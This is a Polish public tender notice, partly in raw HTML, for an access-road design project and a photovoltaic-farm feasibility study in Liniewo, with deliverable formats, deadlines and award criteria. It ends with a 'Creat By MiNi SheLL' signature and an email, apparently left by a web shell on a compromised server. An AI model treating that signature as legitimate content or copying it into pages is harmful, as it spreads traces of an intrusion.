Dokumentację w formie papierowej należy dostarczyć w następującej liczbie egzemplarzy: 
- projekt budowlany - 5 egz. 
- projekty wykonawcze - 3 egz. 
- specyfikację techniczną wykonania i odbioru robót - 3 egz. 
przedmiary, kosztorysy inwestorskie - 3 egz.
opinie uzgodnienia decyzje -1 egz.
Wersję elektroniczną w/w opracowań należy dodatkowo dostarczyć w formie elektronicznej w 2 egz. na płytach CD - pliki w następujących formach: 
- teksty jako pliki w formacie doc, lub innym kompatybilnym z Word 2007, oraz pdf, 
- rysunki jako pliki w formacie dwg (do AutoCad lub innym kompatybilnym z AutoCad), oraz pdf, 
- kosztorysy w formacie Ath lub KST.

Opracowanie dokumentacji projektowej -droga.
Przedmiotem zamówienia jest wykonanie usługi polegającej na opracowaniu projektu budowlanego drogi dojazdowej o długości ok 0,35 km do farmy. Droga przebiega ma przez działki o nr geodezyjnym 536/1, 267/2, 147, 148, 149, obręb ewidencyjny Liniewo, gmina Liniewo. Planowany przebieg drogi prezentuje załącznik nr 1 do  SIWZ
Przygotowanie i uzyskanie decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia wraz z kartą informacji przedsięwzięcia, decyzji o ustaleniu lokalizacji celu publicznego lub warunków zabudowy. 
Zakres prac projektowych obejmuje w szczególności opracowanie: 
- mapy do celów projektowych, 
- uzyskanie decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia , 
- uzyskanie decyzji o warunkach zabudowy lub decyzji o ustaleniu lokalizacji celu publicznego, 
uzyskanie niezbędnych opinii, pozwoleń i uzgodnień wymaganych przepisami szczegółowymi ustawy Prawo budowlane w szczególności opinii ZUD, pozwolenia wodnoprawego w przypadku konieczności jego uzyskania, 
 projektu budowlanego,
przygotowanie wniosku o wystąpienie do stosownych organów o wydanie decyzji pozwolenia na budowę,  
- projektów wykonawczych,
- specyfikacji technicznej wykonania i odbioru robót, 
- przedmiarów oraz kosztorysów dla wszystkich opracowań i branż 
Dokumentację w formie papierowej należy dostarczyć w następującej liczbie egzemplarzy: 
- projekt budowlany - 5 egz. 
- projekty wykonawcze - 3 egz. 
- specyfikację techniczną wykonania i odbioru robót - 3 egz.	przedmiar, kosztorys inwestorski - 3 egz.
opinie, uzgodnienia decyzje -1 egz.
Wersję elektroniczną w-w opracowań należy dodatkowo dostarczyć w formie elektronicznej w 2 egz. na płytach CD - pliki w następujących formach: 
- teksty jako pliki w formacie doc, lub innym kompatybilnym z Word 2007, oraz pdf, 
- rysunki jako pliki w formacie dwg (do AutoCad lub innym kompatybilnym z AutoCad), oraz pdf, 
- kosztorysy w formacie Ath lub KST, 
Wykonawca jest zobowiązany do każdorazowego uaktualnienia kosztorysu inwestorskiego w przypadku jego dezaktualizacji przed terminem ogłoszenia przetargów na realizację inwestycji objętych dokumentacją stanowiącą przedmiot zamówienia. Zobowiązanie wygasa po skutecznym udzieleniu przez Zamawiającego zamówienia lub po upływie 3 lat od daty wykonania przedmiotu umowy. 
Projektant zgodnie z art. 28 ust 3 ustawy Prawo Zamówień Publicznych nie może przedmiotu zamówienia opisywać przez wskazanie znaków towarowych, patentów lub pochodzenia. Jednak gdy specyfika przedmiotu zamówienia powodować będzie iż nie można opisywać przedmiotu zamówienia za pomocą dostatecznie zrozumiałych określeń to oprócz dopisania zwrotu lub równoważny należy określić parametry, funkcje itp., które będą brane pod uwagę przy ocenie czy produkt będzie równoważny..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.02.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 93</li>
<li>2. Termin wykonania zamówienia - 7</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Studium wykonalności dla budowy farmy fotowoltaicznej i drogi dojazdowej w Liniewskich Górach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Opracowanie studium wykonalności dla cześć II
Opracowanie studium wykonalności w celu uzyskania dofinansowania Projektu pn. Budowa farmy ogniw fotowoltaicznych wraz z budową drogi dojazdowej w Liniewskich Górach z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Pomorskiego na lata 2014-2020  dla osi priorytetowej 10 Energia. 
Studium wykonalności musi przedstawiać możliwość realizacji projektu w kontekście analizowanych aspektów: instytucjonalnego, ekonomiczno-finansowego, prawnego, środowiskowego, technicznego oraz wykazać, że projekt jest wart dofinansowania.
Opisany w studium wykonalności projekt powinien być najlepszym z możliwych rozwiązań, umożliwiać kompleksowe dokonanie analizy projektu pod kątem potrzeb i możliwości realizacji projektu oraz jego efektywności, zapobiegać błędnemu wyborowi technologii i podnoszeniu nieracjonalnych kosztów późniejszych prac  projektowych dla nieoptymalnego wariantu, który nie uzyska dofinansowania. Studium wykonalności musi być spójne z Regionalnym Programem Operacyjnym Województwa Pomorskiego na lata 2014-2020.
Dokumentację (studium wykonalności należy wykonać w wersji papierowej w 3 egz. oraz w wersji elektronicznej - na nośniku elektronicznym, przy czym arkusze obliczeniowe do studium wykonalności powinny zawierać aktywne formuły dotyczące sporządzonej analizy finansowej i ekonomicznej w formacie Excel 2010.
Szczegółowy opis wymagań odnośnie studium wykonalności w wytycznych do  Studiów Wykonalności stanowiących załącznik do wniosku o dofinansowanie projektu z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Pomorskiego na lata 2014-2020.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.10.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.03.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 93</li>
<li>2. Termin wykonania zamówienia - 7</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com